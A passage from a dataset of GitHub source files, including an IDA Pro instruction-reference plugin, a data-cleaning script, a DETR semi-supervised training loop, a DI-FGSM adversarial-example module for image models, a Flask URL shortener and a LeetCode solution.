getIdaArchitecture(self):\n inf = idaapi.get_inf_structure()\n\n return inf.procName\n\n def OnClose(self):\n self.destroying = True\n self.is_loaded = False\n\n # give clean up a chance, to prevent a crash\n # because I can't detect in update function\n # that IDA is closing.\n time.sleep(1)\n\n def cleanInstruction(self, inst):\n if self.arch == \"x86-64\":\n inst = inst.upper()\n # hacks for x86\n if inst[0:1] == \"J\" and inst != \"JMP\":\n inst = \"Jcc\"\n elif inst[0:4] == \"LOOP\":\n inst = \"LOOP\"\n elif inst[0:3] == \"INT\":\n inst = \"INT n\"\n elif inst[0:5] == \"FCMOV\":\n inst = \"FCMOVcc\"\n elif inst[0:4] == \"CMOV\":\n inst = \"CMOVcc\"\n elif inst[0:3] == \"SET\":\n inst = \"SETcc\"\n\n return inst\n\n def update(self, force=False):\n inst = self.cleanInstruction(print_insn_mnem(get_screen_ea()))\n\n if inst != self.last_inst or force == True:\n self.load_inst(inst)\n\n def load_inst(self, inst, wasLookup=False):\n inst = self.cleanInstruction(inst)\n\n if wasLookup == False:\n self.last_inst = inst\n\n self.ClearLines()\n\n if inst not in self.inst_map:\n inst = inst.upper()\n\n if inst in self.inst_map:\n text = self.inst_map[inst]\n\n if len(text) > 0:\n self.AddLine(inst + \": \" + text[0])\n if len(text) > 1:\n for line in text[1:]:\n self.AddLine(line)\n\n else:\n self.AddLine(inst + \" not documented.\")\n\n self.Refresh()\n self.Jump(0, 0)\n\n def OnPopupMenu(self, menu_id):\n if menu_id == self.menu_update:\n self.update(True)\n elif menu_id == self.menu_lookup:\n inst = ask_str(self.last_inst, 0, \"Instruction: \")\n if inst != None:\n self.load_inst(inst, True)\n elif menu_id == self.menu_autorefresh:\n self.do_auto = not self.do_auto\n elif menu_id == self.change_arch:\n arch = self.askArchitecture(self.archs)\n\n if arch != None:\n self.loadArchitecture(arch)\n self.update(True)\n else:\n # Unhandled\n return False\n return True\n\n\n\"\"\"\nIDA Pro Plugin Interface\nDefine an IDA Python plugin required class and function.\n\nInpired by idarest plugin.\n\"\"\"\n\nMENU_PATH = \"Edit/idaref/\"\nALTERNATIVE_MENU_PATH = \"Edit/Patch Program/\"\n\n\nclass idaref_plugin_t(idaapi.plugin_t):\n flags = idaapi.PLUGIN_KEEP\n comment = \"\"\n\n help = \"IdaRef: Presents complete instruction reference for an instruction under cursor\"\n wanted_name = \"IDA Instruction Reference\"\n wanted_hotkey = \"Alt-8\"\n website = \"https://github.com/nologic/idaref\"\n\n def _add_menu(self, *args):\n ctx = idaapi.add_menu_item(*args)\n\n if ctx is None:\n idaapi.msg(\"Add failed!\\n\")\n return False\n else:\n self.ctxs.append(ctx)\n return True\n\n def _add_menus(self):\n ret = []\n if idaapi.IDA_SDK_VERSION <= 695:\n menu_path = MENU_PATH if idaapi.IDA_SDK_VERSION > 660 else ALTERNATIVE_MENU_PATH\n ret.append(self._add_menu(menu_path, \"Stop IdaRef\", \"\", 1, self.stop, tuple()))\n ret.append(self._add_menu(menu_path, \"Start IdaRef\", \"\", 1, self.start, tuple()))\n\n if idaapi.IDA_SDK_VERSION >= 700:\n action_desc = idaapi.action_desc_t(\n \"idaref:stop\", # The action name. Must be unique\n \"Stop Idaref\", # Action Text\n StopHandler(), # Action handler\n \"\", # Optional shortcut\n \"Stop Idaref\", # Action tooltip\n )\n idaapi.register_action(action_desc)\n idaapi.attach_action_to_menu(MENU_PATH, \"idaref:stop\", idaapi.SETMENU_APP)\n\n action_desc = idaapi.action_desc_t(\n \"idaref:start\", # The action name. Must be unique\n \"Start Idaref\", # Action Text\n StartHandler(), # Action handler\n \"\", # Optional shortcut\n \"Start Idaref\", # Action tooltip\n )\n idaapi.register_action(action_desc)\n idaapi.attach_action_to_menu(MENU_PATH, \"idaref:start\", idaapi.SETMENU_APP)\n\n if False in ret:\n return idaapi.PLUGIN_SKIP\n else:\n return idaapi.PLUGIN_KEEP\n\n def init(self):\n global initialized\n ret = idaapi.PLUGIN_SKIP\n if initialized == False:\n initialized = True\n self.ctxs = []\n insref_g = None\n ret = self._add_menus()\n idaapi.msg(\"IdaRef initialized\\n\")\n\n return ret\n\n def start(self, *args):\n global insref_g\n idaapi.msg(\"Starting IdaRef\\n\")\n\n if insref_g != None and find_widget(insref_g.title) == None:\n self.stop()\n\n if insref_g == None:\n insref_g = InstructionReference(self)\n else:\n print(\"IdaRef Already started\")\n\n def stop(self, *args):\n global insref_g\n idaapi.msg(\"Stopping IdaRef\\n\")\n\n if insref_g != None:\n insref_g.destroy()\n insref_g = None\n else:\n print(\"IdaRef is not running\")\n\n def run(self, arg):\n pass\n\n def term(self):\n idaapi.msg(\"Terminating %s\\n\" % self.wanted_name)\n try:\n self.stop()\n except:\n pass\n\n for ctx in self.ctxs:\n idaapi.del_menu_item(ctx)\n\n\ndef PLUGIN_ENTRY():\n return idaref_plugin_t()\n","repo_name":"nologic/idaref","sub_path":"idaref.py","file_name":"idaref.py","file_ext":"py","file_size_in_byte":14536,"program_lang":"python","lang":"en","doc_type":"code","stars":627,"dataset":"github-code","pt":"37"} +{"seq_id":"15030155309","text":"import pandas as pd\nimport numpy as np\nimport sys\nfrom sqlalchemy import create_engine\n\n\n'''Global Variables defined: list to store the column data'''\ncolumns=[]\n\ndef get_file_names():\n '''Capture file name arguments passed to command line \n and transfer to relevant functions as their required arguments'''\n files=list()\n for arg in sys.argv:\n files.append(arg)\n if len(files)!=4:\n raise ValueError(\"Provide three filenames to the pipeline\\\n in sequence messages.csv,\\\n categories.csv , databasse.db\")\n if files[1].split('.')[-1]!='csv' :\n raise ValueError (f\"Provide .CSV filename at {files[1]} \")\n if files[2].split('.')[-1]!='csv' :\n raise ValueError (f\"Provide .CSV filename at {files[2]} \")\n if files[3].split('.')[-1]!='db' :\n raise ValueError (f\"Provide .db extension at {files[3]} \")\n return files[1:]\n\n\ndef column_update(l,entry) :\n '''helper function to manage column list '''\n if entry in l:\n pass\n else:\n l.append(entry)\n \n\n\ndef read_categories(path_csv):\n '''This function is to read the categories'\n matrix-data from the categories.csv '''\n #reading the given file \n fp= open(path_csv,'r')\n while(True):\n a=fp.readline()\n if a =='':\n fp.close()\n break\n yield None\n else:\n a=a.replace('\\n','')\n items=a.split(',')\n result=[]\n for item in items:\n splits=item.split(';')\n if item=='categories' :\n continue\n if item=='id':\n column_update(columns,item)\n continue\n elif len(splits) >2 : \n for vals in splits:\n tmp=vals.split('-')\n column_update(columns,tmp[0])\n result.append(int(tmp[-1]))\n else:\n result.append(int(splits[0]))\n if len(result)>=1:\n yield result\n else:\n continue\n\ndef load_data(messages_filepath, categories_filepath):\n '''extracting and two csv file data'''\n messages = pd.read_csv(messages_filepath)\n categories = pd.DataFrame(read_categories(categories_filepath)\n ,columns=columns)\n return messages, categories\n\n\ndef remove_duplicates(df):\n df=df[~df.duplicated()]\n return df\n\ndef clean_data(df):\n #getting all the data into binary formats\n #only related column has non-binary data and \n #this rows doesn't have any data concerning to other columns and \n #hence these are being eliminated. \n df=df[~(df['related']==2)]\n #Also to note that column 'child_alone' have all rows with values as zero but\n #the column is not being dropped inorder to preserve it for \n #availability in future data.\n #df=df.drop(columns=['child_alone'])\n return df\n\ndef merge_dataframe(messages,categories):\n df = messages.merge(categories, on = 'id', how='left')\n return df\n\ndef save_data(df, database_filename,tableName):\n engine = create_engine(f'sqlite:///{database_filename}')\n conn=engine.connect()\n engine.execute(f\"DROP TABLE IF EXISTS {tableName}\")\n df.to_sql(tableName, conn, index=False)\n return True \n\n\ndef main():\n if len(sys.argv) == 4:\n\n messages_filepath, categories_filepath, database_filepath = get_file_names()\n\n print('Loading data...\\n MESSAGES: {}\\n CATEGORIES: {}'\n .format(messages_filepath, categories_filepath))\n message,categories = load_data(messages_filepath, categories_filepath)\n\n print('Cleaning data...')\n message = remove_duplicates(message)\n categories = remove_duplicates(categories)\n df = clean_data(merge_dataframe(message,categories))\n \n print('Saving data...\\n DATABASE: {}'.format(database_filepath))\n tableName='categorizedMessages'\n save_data(df, database_filepath,tableName)\n \n print('Cleaned data saved to database!')\n \n else:\n print('Please provide the filepaths of the messages and categories '\\\n 'datasets as the first and second argument respectively, as '\\\n 'well as the filepath of the database to save the cleaned data '\\\n 'to as the third argument. \\n\\nExample: python process_data.py '\\\n 'disaster_messages.csv disaster_categories.csv '\\\n 'DisasterResponse.db')\n\n\nif __name__ == '__main__':\n main()","repo_name":"rindhane/MessageLabelling","sub_path":"data/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":4563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74126301866","text":"import os\nimport subprocess\n\npwd = os.getcwd()\n\ntarget_dir = os.path.join(pwd, '..\\\\cmake-build-debug')\n\ncompile_path = os.path.join(target_dir, 'Compiler.exe')\nmips_path = os.path.join(target_dir, 'mips.txt')\n\ntestfile_dst = os.path.join(target_dir, \"testfile.txt\")\ninput_dst = os.path.join(target_dir, \"input.txt\")\noutput_dst = os.path.join(target_dir, \"output.txt\")\n\n# 检测cmake-build-debug下是否有Mars\nmars_path = os.path.join(target_dir, 'Mars4Compiler.jar')\nif not os.path.exists(mars_path):\n print('Cannot find Mars: copy one')\n os.system('xcopy /y Mars4Compiler.jar ..\\\\cmake-build-debug\\\\')\n\n# 打印基本测试信息\ntest_dir = os.path.join(pwd, \"2021-test-1201\") # 2022-test-1105\ntest_dir = os.path.join(pwd, \"2022-test-1105\")\ntar_no = 2\ntar_level = 'A'\nroot = os.path.join(test_dir, tar_level)\n\nprint('dataset:', os.path.split(test_dir)[1])\nprint('level:', tar_level)\nprint('testfile', tar_no)\nprint('============================')\n\n# 将测试文件拷贝到cmake-build-debug目录下,便于测试\ntestfile_src = os.path.join(root, 'testfile' + str(tar_no) + '.txt')\ninput_src = os.path.join(root, 'input' + str(tar_no) + '.txt')\noutput_src = os.path.join(root, 'output' + str(tar_no) + '.txt')\nos.system('echo f | xcopy /y ' + testfile_src + ' ' + testfile_dst + ' > log.txt')\nos.system('echo f | xcopy /y ' + input_src + ' ' + input_dst + ' > log.txt')\nos.system('echo f | xcopy /y ' + output_src + ' ' + output_dst + ' > log.txt')\n\n# 在cmake-build-debug目录下运行Compiler.exe,得到mips.txt\nsubprocess.run(compile_path, cwd=target_dir, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n# 利用mars输入测试input.txt并得到结果\nfin = open(input_dst, mode='r')\nsp = subprocess.Popen(\"java -jar Mars4Compiler.jar mips.txt\", cwd=target_dir, stdin=fin, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\nres = bytes.decode(sp.communicate()[0])\nprint('[self]')\nprint(res)\nprint('-------------------')\nres_list = res.replace('\\r\\n', '\\n').split('\\n')[2:]\nsp.kill()\nfin.close()\n\n# 与output.txt对比检验\nfcheck = open(output_dst, mode='r')\nans = fcheck.read()\nprint('[ans]')\nprint(ans)\nprint('-------------------')\nans_list = ans.replace('\\r\\n', '\\n').split('\\n')\nfcheck.close()\nline_num = min(len(ans_list), len(res_list))\nif len(ans_list) != len(res_list):\n print('[warning] line num different! ans-res :', str(len(ans_list)) + '-' + str(len(res_list)))\nwrong_line = []\nflag = True\nfor lno in range(line_num):\n if res_list[lno] != ans_list[lno]:\n wrong_line.append(lno + 1)\n flag = False\n # break\nprint('pass' if flag else 'wrong at line ' + str(wrong_line))\n\n\n","repo_name":"Xlucidator/2022-BUAA-Compiler","sub_path":"test/single_test.py","file_name":"single_test.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"23786632545","text":"import torch\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndevice=torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nclass Vertex():\n def __init__(self, row, col):\n self.row=row\n self.col=col\n self.parent=None\n \n def __repr__(self):\n return 'Row: {:.2f}, Col: {:.2f}'.format(self.row, self.col)\n\nclass Env2D():\n def __init__(self, h, w, N):\n self.h=h\n self.w=w\n self.grid=torch.zeros(h,w).to(device)\n self.start=None\n self.goal=None\n self.generate_obstacles(N) #0: free space, 1: obstacles\n self.get_start_and_goal()\n self.vertices=self.get_vertices()\n\n def generate_obstacles(self, N):\n for _ in range(N):\n obs_r1=np.random.randint(low=0, high=self.h)\n obs_r2=np.random.randint(low=obs_r1, high=self.h)\n obs_c1=np.random.randint(low=0, high=self.w)\n obs_c2=np.random.randint(low=obs_c1, high=self.w)\n #mark obstacle grids with 1\n self.grid[obs_r1:obs_r2+1, obs_c1:obs_c2+1]=1\n return\n \n def get_vertices(self):\n vertices=[]\n for row in range(self.h):\n for col in range(self.w):\n if self.grid[row,col]==0:\n vertices.append(Vertex(row,col))\n return vertices\n\n def config_is_valid(self, row, col):\n validity=False\n if row>=0 and row=0 and col 0:\n print('Missing Keys: {}'.format(missing_keys))\n if len(unexpected_keys) > 0:\n print('Unexpected Keys: {}'.format(unexpected_keys))\n if not cfg.EVAL and 'optimizer' in checkpoint and 'lr_scheduler' in checkpoint and 'epoch' in checkpoint:\n import copy\n p_groups = copy.deepcopy(optimizer.param_groups)\n optimizer.load_state_dict(checkpoint['optimizer'])\n for pg, pg_old in zip(optimizer.param_groups, p_groups):\n pg['lr'] = pg_old['lr']\n pg['initial_lr'] = pg_old['initial_lr']\n\n lr_scheduler.load_state_dict(checkpoint['lr_scheduler'])\n # todo: this is a hack for doing experiment that resume from checkpoint and also modify lr scheduler (e.g., decrease lr in advance).\n override_resumed_lr_drop = True\n if override_resumed_lr_drop:\n print('Warning: (hack) override_resumed_lr_drop is set to True, so cfg.TRAIN.LR_DROP would override lr_drop in resumed lr_scheduler.')\n lr_scheduler.step_size = cfg.TRAIN.LR_DROP\n lr_scheduler.base_lrs = list(map(lambda group: group['initial_lr'], optimizer.param_groups))\n lr_scheduler.step(lr_scheduler.last_epoch)\n cfg.START_EPOCH = checkpoint['epoch'] + 1 \n # check the resumed model\n if not cfg.EVAL:\n test_stats, coco_evaluator = evaluate(\n model, criterion, postprocessors, data_loader_val, base_ds, device, cfg.OUTPUT_DIR\n )\n print('测试完毕'.center(50, '*'))\n\n # if cfg.EVAL:\n # test_stats, coco_evaluator = evaluate(model, criterion, postprocessors,\n # data_loader_val, base_ds, device, cfg.OUTPUT_DIR)\n # if cfg.OUTPUT_DIR:\n # utils.save_on_master(coco_evaluator.coco_eval[\"bbox\"].eval, output_dir / \"eval.pth\")\n # return\n\n#-------------------2023.03.17-------创建EMAmodel---------------------\n # EMA\n ema_model = EMA.ModelEMA(model)\n\n semi_ema = None\n #评估时使用\n #原版模型\n best_checkpoint_fitness = 0\n #semi_ema\n best_semi_ema_fitness = 0\n cache_best_semi_ema_epoch = 0\n #ema\n best_ema_fitness = 0\n cache_best_ema_epoch = 0\n\n #---记录评估指标---\n ema_model_eval = []\n semi_ema_model_eval = []\n if cfg.SSOD.RESUME_EMA:\n checkpoint_ema = torch.load(cfg.SSOD.RESUME_EMA, map_location='cpu')\n ema_model.ema.load_state_dict(checkpoint_ema['ema_model'], strict=True)\n#---------------------------------------------------------------------\n\n#===============adaptive thoushold 20230406=================\n th = cfg.SSOD.thoushold_value\n AT = None\n if cfg.SSOD.adaptive_thoushold:\n from models.label_match import AdaptiveThreshold\n #自适应阈值网络初始化\n AT = AdaptiveThreshold(cfg.DATASET.NUM_CLASSES - 1,th)\n#==========================================================\n\n print(\"Start training\")\n cfg.START_EPOCH = 0 #修改初始位置用于半监督训练\n start_time = time.time()\n for epoch in range(cfg.START_EPOCH, cfg.TRAIN.EPOCHS):\n #--------------原版对抗训练----------------\n # epoch从 0 开始\n if epoch < cfg.SSOD.burn_epochs:\n if cfg.DIST.DISTRIBUTED:\n sampler_train.set_epoch(epoch)\n #--------------------------------------\n #---由于训练波动较大,将最佳模型赋予model用于40epoch之后的训练,以进一步提升最佳模型结果\n\n if epoch == cfg.TRAIN.LR_DROP:\n # if utils.is_main_process():\n print(\n '加载最佳模型'\n )\n\n checkpoint_ema = torch.load(os.path.join(output_dir,'best_ema.pth'), map_location='cpu')\n if not cfg.DIST.DISTRIBUTED:\n model_without_ddp.load_state_dict(checkpoint_ema['ema_model'], strict=True)\n else:#DDP模型\n state_dict = {k.replace(\"module.\",\"\"):v for k, v in checkpoint_ema['ema_model'].items()}\n model_without_ddp.load_state_dict(state_dict, strict=True)\n\n #评估,用于debug\n test_stats, coco_evaluator = evaluate(\n model, criterion, postprocessors, data_loader_val, base_ds, device, cfg.OUTPUT_DIR\n ) #----------------------------------------\n\n\n train_stats = train_one_epoch(\n model, criterion, data_loader_train, optimizer, device, epoch, cfg.TRAIN.CLIP_MAX_NORM)\n\n\n else:\n if cfg.DIST.DISTRIBUTED:\n sampler_train.set_epoch(epoch)\n sampler_train_strong_aug.set_epoch(epoch)\n\n\n # -------------------2023.03.17-------创建EMAmodel---------------------\n #(1)ema权重赋值\n # 1.1 将ema的权重赋值给model\n if epoch == cfg.SSOD.burn_epochs:\n #重新设置学习率,学习率*10\n for p in optimizer.param_groups:\n p['lr'] *= 10\n\n print(\n '加载最佳模型,半监督训练'\n )\n\n checkpoint_ema = torch.load(os.path.join(output_dir,'best_ema.pth'), map_location='cpu')\n if not cfg.DIST.DISTRIBUTED:\n model_without_ddp.load_state_dict(checkpoint_ema['ema_model'], strict=True)\n ema_model.ema.load_state_dict(checkpoint_ema['ema_model'], strict=True)\n else: #DDP\n state_dict = {k.replace(\"module.\", \"\"): v for k, v in checkpoint_ema['ema_model'].items()}\n model_without_ddp.load_state_dict(state_dict, strict=True)\n ema_model.ema.load_state_dict(state_dict, strict=True)\n\n # 评估,用于debug\n # test_stats, coco_evaluator = evaluate(\n # ema_model.ema, criterion, postprocessors, data_loader_val, base_ds, device, cfg.OUTPUT_DIR\n # ) # ---------------------\n\n\n #1.2 创建semi_ema\n if cfg.SSOD.cosine_ema:\n semi_ema = EMA.CosineEMA(ema_model.ema, decay_start=cfg.SSOD.ema_rate,\n total_epoch= cfg.TRAIN.EPOCHS - cfg.SSOD.burn_epochs)\n else:\n semi_ema = EMA.SemiSupModelEMA(ema_model.ema, cfg.SSOD.ema_rate)\n #(2)训练\n train_stats = train_one_epoch_with_ssod(\n model, criterion, criterion_ssod,data_loader_train, data_loader_train_strong_aug,optimizer, device, epoch, ema_model,output_dir,\n AT,cfg.DATASET.NUM_CLASSES,th,cfg.TRAIN.CLIP_MAX_NORM)\n\n #(3)训练后\n #需要更新 ema 和 semi_ema\n #1)更新ema\n ema_model.update(model)\n #2)更新semi_ema\n if semi_ema:\n semi_ema.update_decay(epoch - cfg.SSOD.burn_epochs) #更新semi_ema的decay\n semi_ema.update(ema_model.ema)\n\n lr_scheduler.step()\n\n #(4)评估\n #4.1原版模型评估\n test_stats, coco_evaluator = evaluate(\n model, criterion, postprocessors, data_loader_val, base_ds, device, cfg.OUTPUT_DIR\n )\n #4.2\n #1)存在semi_ema则评估semi_ema\n if epoch >= cfg.SSOD.burn_epochs:\n test_stats_semi_ema, coco_evaluator_semi_ema = evaluate(\n semi_ema.ema, criterion, postprocessors, data_loader_val, base_ds, device, cfg.OUTPUT_DIR\n )\n #2)不存在则评估ema_model\n else:\n test_stats_ema, coco_evaluator_ema = evaluate(\n ema_model.ema, criterion, postprocessors, data_loader_val, base_ds, device, cfg.OUTPUT_DIR\n )\n\n #(5)存储\n if cfg.OUTPUT_DIR and utils.is_main_process():\n #5.1存储最佳原版模型(IOU=0.5)\n if test_stats['coco_eval_bbox'][1] >= best_checkpoint_fitness:\n best_checkpoint_fitness = test_stats['coco_eval_bbox'][1]\n checkpoint_path = output_dir / 'best_checkpoint.pth'\n cache_best_checkpoint_epoch = epoch #记录epoch数\n utils.save_on_master({\n 'model': model_without_ddp.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'lr_scheduler': lr_scheduler.state_dict(),\n 'epoch': epoch,\n 'cfg': cfg,\n }, checkpoint_path)\n\n #5.2 存储最佳ema模型(IOU=0.5)\n #1)存储最佳semi_ema\n if epoch >= cfg.SSOD.burn_epochs:\n semi_ema_model_eval.append(test_stats_semi_ema['coco_eval_bbox'][1])\n #记录结果\n with open(output_dir / \"semi_ema_model_eval.txt\", 'w') as f:\n for i in semi_ema_model_eval:\n f.write('%s\\n'%i)\n\n if test_stats_semi_ema['coco_eval_bbox'][1] >= best_semi_ema_fitness:\n best_semi_ema_fitness = test_stats_semi_ema['coco_eval_bbox'][1]\n checkpoint_path = output_dir / 'best_semi_ema.pth'\n cache_best_semi_ema_epoch = epoch # 记录epoch数\n utils.save_on_master({\n 'semi_ema_model': semi_ema.ema.state_dict(),\n 'epoch': epoch,\n }, checkpoint_path)\n\n #2)存储最佳ema\n if epoch < cfg.SSOD.burn_epochs:\n ema_model_eval.append(test_stats_ema['coco_eval_bbox'][1])\n #记录结果\n with open(output_dir / \"ema_model_eval.txt\", 'w') as f:\n for i in ema_model_eval:\n f.write('%s\\n'%i)\n\n if test_stats_ema['coco_eval_bbox'][1] >= best_ema_fitness:\n best_ema_fitness = test_stats_ema['coco_eval_bbox'][1]\n checkpoint_path = output_dir / 'best_ema.pth'\n cache_best_ema_epoch = epoch # 记录epoch数\n utils.save_on_master({\n 'ema_model': ema_model.ema.state_dict(),\n 'epoch': epoch,\n }, checkpoint_path)\n\n #(6)记录日志\n with open(output_dir / \"log_best.txt\",'w') as f:\n f.write('best_checkpoint --> map50:%s , epoch:%s\\n'%(best_checkpoint_fitness,cache_best_checkpoint_epoch))\n f.write('best_semi_ema --> map50:%s , epoch:%s\\n'%(best_semi_ema_fitness,cache_best_semi_ema_epoch))\n f.write('best_ema --> map50:%s , epoch:%s\\n'%(best_ema_fitness,cache_best_ema_epoch))\n\n\n\n log_stats = {**{f'train_{k}': v for k, v in train_stats.items()},\n **{f'test_{k}': v for k, v in test_stats.items()},\n 'epoch': epoch,\n 'n_parameters': n_parameters}\n\n if cfg.OUTPUT_DIR and utils.is_main_process():\n with (output_dir / \"log.txt\").open(\"a\") as f:\n f.write(json.dumps(log_stats) + \"\\n\")\n\n # for evaluation logs\n if coco_evaluator is not None:\n (output_dir / 'eval').mkdir(exist_ok=True)\n if \"bbox\" in coco_evaluator.coco_eval:\n filenames = ['latest.pth']\n if epoch % 50 == 0:\n filenames.append(f'{epoch:03}.pth')\n for name in filenames:\n torch.save(coco_evaluator.coco_eval[\"bbox\"].eval,\n output_dir / \"eval\" / name)\n\n total_time = time.time() - start_time\n total_time_str = str(datetime.timedelta(seconds=int(total_time)))\n print('Training time {}'.format(total_time_str))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser('Deformable DETR Detector')\n parser.add_argument('--config_file', default='', type=str)\n parser.add_argument(\"--opts\", default=None, nargs=argparse.REMAINDER)\n args = parser.parse_args()\n cfg = setup(args)\n main(cfg)\n","repo_name":"h751410234/RemoteSensingTeacher","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":20603,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"70232488106","text":"import numpy as np\r\nimport torch\r\nimport torch.nn.functional as F\r\n\r\nfrom .. import Attack\r\n\r\nclass DIFGSM(Attack):\r\n def __init__(self, model, dataloader, save_path, criterion,\r\n eps=8, steps=10, ieps=2, decay=1.0, resize_rate=0.9, diversity_prob=0.5):\r\n _name = 'DIFGSM_{}_{}_{}_{}'.format(eps, steps, ieps, decay)\r\n super(DIFGSM, self).__init__(_name, model, dataloader, save_path)\r\n self.criterion = criterion\r\n self.eps = eps / 255\r\n self.steps = steps\r\n self.ieps = ieps / 255\r\n self.decay = decay\r\n self.resize_rate = resize_rate\r\n self.diversity_prob = diversity_prob\r\n\r\n\r\n def attack(self, images, labels=None):\r\n # random_start\r\n delta = torch.empty_like(images, requires_grad=False)\r\n delta = delta.uniform_(-self.eps, self.eps)\r\n delta = torch.clamp(images + delta, 0, 1) - images\r\n momentum = torch.zeros_like(images).detach().to(self.device)\r\n adv_images = images.clone().detach()\r\n for _ in range(self.steps):\r\n adv_images.requires_grad = True\r\n outputs = self.model(self.input_diversity(adv_images))\r\n loss = self.criterion(outputs, labels)\r\n grad = torch.autograd.grad(loss, adv_images,\r\n retain_graph=False, create_graph=False)[0]\r\n grad = grad / torch.mean(torch.abs(grad), dim=(1, 2, 3), keepdim=True)\r\n grad = grad + momentum * self.decay\r\n momentum = grad\r\n delta += self.ieps * grad.sign()\r\n delta = torch.clamp(delta, -self.eps, self.eps)\r\n adv_images = torch.clamp(images + delta, 0, 1)\r\n delta = (adv_images - images).detach()\r\n return (adv_images - images).detach()\r\n\r\n def input_diversity(self, x):\r\n img_size = x.shape[-1]\r\n img_resize = int(img_size * self.resize_rate)\r\n\r\n if self.resize_rate < 1:\r\n img_size = img_resize\r\n img_resize = x.shape[-1]\r\n\r\n rnd = torch.randint(low=img_size, high=img_resize, size=(1,), dtype=torch.int32)\r\n rescaled = F.interpolate(x, size=[rnd, rnd], mode='bilinear', align_corners=False)\r\n h_rem = img_resize - rnd\r\n w_rem = img_resize - rnd\r\n pad_top = torch.randint(low=0, high=h_rem.item(), size=(1,), dtype=torch.int32)\r\n pad_bottom = h_rem - pad_top\r\n pad_left = torch.randint(low=0, high=w_rem.item(), size=(1,), dtype=torch.int32)\r\n pad_right = w_rem - pad_left\r\n\r\n padded = F.pad(rescaled, [pad_left.item(), pad_right.item(), pad_top.item(), pad_bottom.item()], value=0)\r\n\r\n return padded if torch.rand(1) < self.diversity_prob else x\r\n\r\n\r\n","repo_name":"NoWindButRain/IMPure","sub_path":"advattack/difgsm/difgsm.py","file_name":"difgsm.py","file_ext":"py","file_size_in_byte":2698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"901250351","text":"import boto3\n\ndef authenticate_user(headers):\n bearer_token = headers.get('Authorization').split('Bearer ')[1]\n try:\n client = boto3.client('cognito-idp')\n response = client.get_user(\n AccessToken=bearer_token)\n\n except Exception as e:\n raise Exception(str(e))\n \n return response","repo_name":"yadavbhudev11/template-backend","sub_path":"playground/common/user_autentication.py","file_name":"user_autentication.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12552312847","text":"#!/usr/bin/env python3\n\n# May you recognize your weaknesses and share your strengths.\n# May you share freely, never taking more than you give.\n# May you find love and love everyone you find.\n\nimport os\nimport sqlite3\n\nfrom flask import (\n Flask,\n g,\n redirect,\n render_template,\n request,\n)\napp = Flask(__name__)\n\n\ndef get_db():\n db = getattr(g, '_database', None)\n if db is None:\n db_path = os.path.join(app.instance_path, 'zoom.db')\n db = sqlite3.connect(db_path)\n db.row_factory = sqlite3.Row\n g._database = db\n\n return db\n\n@app.teardown_appcontext\ndef close_connection(exception):\n db = getattr(g, '_database', None)\n if db is not None:\n db.close()\n\ndef init_db():\n \"\"\"Initialize the database.\n\n Use this like so:\n >>> from zoom_shortener import init_db\n >>> init_db()\n \"\"\"\n with app.app_context():\n db_path = os.path.join(app.instance_path, 'zoom.db')\n if os.path.exists(db_path):\n return\n\n print('Setting up database at {}...'.format(db_path))\n os.makedirs(app.instance_path, exist_ok=True)\n\n db = get_db()\n with app.open_resource('schema.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n print('done!')\n\ndef query_db(query, args=(), one=False):\n cur = get_db().execute(query, args)\n rv = cur.fetchall()\n cur.close()\n return (rv[0] if rv else None) if one else rv\n\n@app.route('/create')\ndef create_new_link():\n redirects = query_db('select * from redirects')\n return render_template('create.html', redirects=redirects)\n\n@app.route('/create', methods=['POST'])\ndef handle_new_link():\n link_id = request.form['short-id']\n url = request.form['long-url']\n try:\n db = get_db()\n db.execute('insert into redirects values (?, ?)', (link_id, url))\n db.commit()\n except sqlite3.IntegrityError:\n return 'sorry, key already used'\n\n return 'ok'\n\n@app.route('/')\ndef redirect_to_url(link_id):\n row = query_db('select url from redirects where id=?', (link_id,), one=True)\n if not row:\n return 'not found'\n return redirect(row['url'], code=307)\n\n\ninit_db()\n","repo_name":"xiongchiamiov/zoom","sub_path":"zoom_shortener/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"74752615146","text":"#reduce() : for cummulative operations\n#reduce() function takes 2 arguments:\n# 1.lambda function\n# 2.Iterable type like list\n\nfrom functools import reduce\n#ex:1\nlist1=[1,2,3,4,5,6]\n\nres1=reduce(lambda x,y:x+y,list1)\nprint(res1)\n\n#o/p:\n#(((((1+2)+3)+4)+5)+6) =21\n\n#ex:2 To find the largest number\nres2=reduce(lambda x,y:x if(x>y) else y,list1)\nprint(res2)\n","repo_name":"Shashivardhan3/python","sub_path":"Functions/26 reduce.py","file_name":"26 reduce.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17544764617","text":"from bisect import bisect_right\nfrom typing import List\n\n\nclass Solution:\n \"\"\"\n Đề bài cho 1 list sorted arr, và target number\n Dựa vào target number ta phải kiểm tra sum của 2 index trong arr bằng với target\n Ý tưởng: Binary Search\n Loop qua từng num trong arr numbers, sau đó init left, right\n và tmp, tmp là target để tìm trong mảng con dùng Binary Search\n P/s: Bài yêu cầu trả ra kết quả với index + 1 [0, 1] target = 1 -> [1, 2]\n \"\"\"\n\n def twoSum(self, numbers: List[int], target: int) -> List[int]:\n for i in range(len(numbers)):\n left, right = i + 1, len(numbers) - 1\n tmp = target - numbers[i]\n while left <= right:\n mid = left + (right - left) // 2\n if numbers[mid] == tmp:\n return 